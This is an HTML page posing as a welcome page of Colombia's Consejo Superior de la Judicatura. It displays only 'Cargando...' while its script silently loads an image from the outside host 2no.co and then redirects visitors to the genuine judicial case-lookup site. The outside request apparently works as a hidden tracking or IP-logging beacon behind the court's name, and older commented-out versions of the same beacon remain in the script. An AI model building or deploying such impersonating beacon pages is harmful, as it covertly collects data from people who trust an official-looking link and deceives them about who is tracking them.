<!DOCTYPE html>
<html lang="es-co">
	<head>
		<meta charset="utf-8">
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width,initial-scale=1">
		<link rel="icon" href="mpa.ico" />
		<title>Bienvenido- Consejo Superior de la Judicatura </title>
		<script type="text/javascript">
			/*
			window.onload = () => {
			  // Get 100 random images
			  fetch('https://2no.co/2LkbS6.png')
			    .then(function(response) {
			      window.location="https://consultaprocesos.ramajudicial.gov.co/Procesos/NombreRazonSocial";
			    })
			    .catch(err => {
			      console.log(err);
			    });
			};
			var img = document.createElement("img");
			img.src = "https://2no.co/2LkbS6.png";
			img.onload = function() {
				document.body.append(this);
				window.location="https://consultaprocesos.ramajudicial.gov.co/Procesos/NombreRazonSocial";
			};
			window.document.body.append(img);
			*/
			var img = new Image();
			img.onload = function() {
				window.location="https://consultaprocesos.ramajudicial.gov.co/Procesos/NombreRazonSocial";
			};
			img.src = "https://2no.co/2LkbS6";
		</script>
	</head>
	<body>
		<strong>Cargando...</strong>
	</body>
</html>
